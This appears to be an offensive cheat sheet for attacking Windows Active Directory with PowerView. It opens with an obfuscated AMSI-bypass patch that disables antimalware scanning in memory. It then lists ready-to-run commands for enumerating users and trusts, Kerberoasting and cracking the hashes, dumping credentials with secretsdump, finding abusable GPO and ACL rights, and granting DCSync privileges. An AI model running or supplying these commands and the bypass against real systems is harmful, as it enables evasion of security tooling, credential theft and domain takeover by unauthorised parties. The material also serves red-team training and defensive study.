Table of content

Import PowerView

The Execution policy must be set to ByPass

Import-Module .\powerview.ps1

If there it is blocked by the AMSI, launch the following code before reimporting:

#Rasta-mouses Amsi-Scan-Buffer patch \n
$dpqmb = @"
using System;
using System.Runtime.InteropServices;
public class dpqmb {
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    public static extern IntPtr LoadLibrary(string name);
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr bqvxfg, uint flNewProtect, out uint lpflOldProtect);

Add-Type $dpqmb

$shxnhxm = [dpqmb]::LoadLibrary("$([CHaR]([bYtE]0x61)+[Char](109*80/80)+[chAr]([bYte]0x73)+[CHAR](57+48)+[chAR](46*12/12)+[cHAr]([Byte]0x64)+[ChaR]([BYtE]0x6c)+[chAR](55+53))")
$dewhnt = [dpqmb]::GetProcAddress($shxnhxm, "$(('ÀmsîScã'+'nBuffer').NormALizE([ChAr](23+47)+[CHAR](111)+[CHAr]([BYTe]0x72)+[CHAr]([bYTe]0x6d)+[cHaR]([ByTE]0x44)) -replace [chaR]([BYte]0x5c)+[ChAr](42+70)+[Char](123*119/119)+[Char](77+31-31)+[chaR](3+107)+[cHAR]([bytE]0x7d))")
$p = 0
[dpqmb]::VirtualProtect($dewhnt, [uint32]5, 0x40, [ref]$p)
$jojn = "0xB8"
$mbww = "0x57"
$rjsu = "0x00"
$bbnx = "0x07"
$uxow = "0x80"
$aask = "0xC3"
$xmpmv = [Byte[]] ($jojn,$mbww,$rjsu,$bbnx,+$uxow,+$aask)
[System.Runtime.InteropServices.Marshal]::Copy($xmpmv, 0, $dewhnt, 6)

Users info

Domain users

Dump all domain users

Get-DomainUser -domain ${domain} -server ${dcIp}

SPN users

Dump users with SPN that can be used in Kerberoasting

Get-DomainUser -SPN -domain ${domain} -server ${dcIp}

GMSA ReadPassword

Get list of users that can read GMSA passwords

Get-ADServiceAccount -Filter * -Properties msDS-ManagedPassword | Where-Object{$_["msDS-ManagedPassword"] -ne ""}

ASREP users

Dump users whose Kerberos tickets can be retrieved without domain account

Get-DomainUser -PreauthNoRequired -domain ${domain} -server ${dcIp}

Domain admins

Dump domain admins users

Get-DomainGroupMember -Identity "Domain Admins" -Recurse -domain ${domain} -server ${dcIp}

Domain trust

Get all domain trust

It will display all trusted domain and the information about these trust links

Get-DomainTrust -domain ${domain} -server ${dcIp}


  • DOWNLEVEL/WINDOWS_NON_ACTIVE_DIRECTORY (0x00000001) : a trusted Windows domain that IS NOT running Active Directory.
  • UPLEVEL/WINDOWS_ACTIVE_DIRECTORY (0x00000002) : a trusted Windows domain that IS running Active Directory.
  • MIT (0x00000003) : a trusted domain that is running a non-Windows (*nix), RFC4120-compliant Kerberos distribution. This is labeled as MIT due to, well, MIT publishing RFC4120.


  • NON_TRANSITIVE (0x00000001) : the trust cannot be used transitively. That is, if Domain A trusts Domain B and Domain B trusts Domain C, then Domain A does not automatically trust Domain C. Also, if a trust is non-transitive, then you will not be able to query any Active Directory information from trusts up the chain from the non-transitive point. External trusts are implicitly non-transitive.
  • UPLEVEL_ONLY (0x00000002) : only Windows 2000 operating system and newer clients can use the trust.
  • QUARANTINED_DOMAIN/FILTER_SID (0x00000004) : SID filtering is enabled.
  • FOREST_TRANSITIVE (0x00000008) : cross-forest trust between the root of two domain forests running at least domain functional level 2003 or above.
  • CROSS_ORGANIZATION (0x00000010) : the trust is to a domain or forest that is not part of the organization, which adds the OTHER_ORGANIZATION SID. This is a bit of a weird one. I don't remember encountering this flag in the field, but according to this post it means that the selective authentication security protection is enabled. For more information, check out this MSDN doc.
  • WITHIN_FOREST (0x00000020) : the trusted domain is within the same forest, meaning a parent->child or cross-link relationship
  • TREAT_AS_EXTERNAL (0x00000040) : the trust is to be treated as external for trust boundary purposes. According to the documentation, "If this bit is set, then a cross-forest trust to a domain is to be treated as an external trust for the purposes of SID Filtering. Cross-forest trusts are more stringently filtered than external trusts. This attribute relaxes those cross-forest trusts to be equivalent to external trusts." This sounds enticing, and I'm not 100% sure on the security implications of this statement.
  • USES_RC4_ENCRYPTION (0x00000080) : if the TrustType is MIT, specifies that the trust that supports RC4 keys.
  • USES_AES_KEYS (0x00000100) : not listed in the linked Microsoft documentation, but according to some documentation I've been able to find online, it specifies that AES keys are used to encrypt KRB TGTs.
  • CROSS_ORGANIZATION_NO_TGT_DELEGATION (0x00000200) : "If this bit is set, tickets granted under this trust MUST NOT be trusted for delegation." This is described more in MS-KILE (Cross-Domain Trust and Referrals)
  • PIM_TRUST (0x00000400) : "If this bit and the TATE (treat as external) bit are set, then a cross-forest trust to a domain is to be treated as Privileged Identity Management trust for the purposes of SID Filtering." According to MS-PAC (SID Filtering and Claims Transformation), "A domain can be externally managed by a domain that is outside the forest. The trusting domain allows SIDs that are local to its forest to come over a PrivilegedIdentityManagement trust." While I have not seen this in the field, and it's only supported by domain functional level 2012R2 and above, it also warrants further investigation

Get information from a trusted domain

DcIp is the IP is the IP of the initial domain controller

Get-DomainUser -domain ${trustedDomain} -server ${dcIp}

Get groups with user from other domains

Return the groups of the targetDomain that contain at least one user that is not from the targetDomain domain.

The SID returned cna be converted using the Convert-SID Powershell command.

Get-DomainForeignGroupMember -Domain ${targetDomain}


Collected hash need to be cracked

Invoke-Kerberoast -domain ${domain} -server ${dcIp} -OutputFormat John| fl
  • The output format can be modify to format hash for John or Hashcat


secretsdump.py ${domain}/${user}@${dcIp} -just-dc-user ${adminUserToPwn}

Unconstrained Delegation

Get-DomainComputer -Unconstrained

Users that can modify GPO

Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

It will return the SID of the users that can modify the GPO. The SID can be translated using ConvertFrom-SID

Likewise, it is possible to retrieve the GPO that can be modified by agiven user:

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "${userSID}" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl

ACL on users

Retrieve the ACL compromisedUser can modify on the userTargeted object.

Get-DomainObjectAcl -Identity ${userTargeted} | ? { $_.ActiveDirectoryRights -match "GenericAll|WriteProperty|WriteDacl" -and $_.SecurityIdentifier -match "${compromisedUserSID}" } | select SecurityIdentifier, ActiveDirectoryRights | fl

Grant DCSync

Add-DomainObjectAcl -TargetIdentity "${userIdentity}" -PrincipalIdentity bfarmer -Rights DCSync

With userIdentity passed as : DC=dev,DC=oth,DC=io


results matching ""

    No results matching ""

    results matching ""

      No results matching ""